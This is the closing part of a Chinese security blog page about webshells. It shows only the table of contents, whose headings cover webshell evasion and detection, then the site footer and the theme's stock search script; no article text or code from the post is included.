class="nav-text">动态函数$a($b)</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Webshell免杀"><span class="nav-number">4.</span> <span class="nav-text">Webshell免杀</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Webshell客户端"><span class="nav-number">5.</span> <span class="nav-text">Webshell客户端</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#客户端与服务端"><span class="nav-number">5.1.</span> <span class="nav-text">客户端与服务端</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Webshell检测"><span class="nav-number">6.</span> <span class="nav-text">Webshell检测</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#应急响应检测"><span class="nav-number">6.1.</span> <span class="nav-text">应急响应检测</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#文件MD5校验"><span class="nav-number">6.1.0.1.</span> <span class="nav-text">文件MD5校验</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#diff命令"><span class="nav-number">6.1.0.2.</span> <span class="nav-text">diff命令</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#版本控制工具"><span class="nav-number">6.1.0.3.</span> <span class="nav-text">版本控制工具</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#文件对比工具"><span class="nav-number">6.1.0.4.</span> <span class="nav-text">文件对比工具</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#NSA检测"><span class="nav-number">6.2.</span> <span class="nav-text">NSA检测</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">mys3t</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
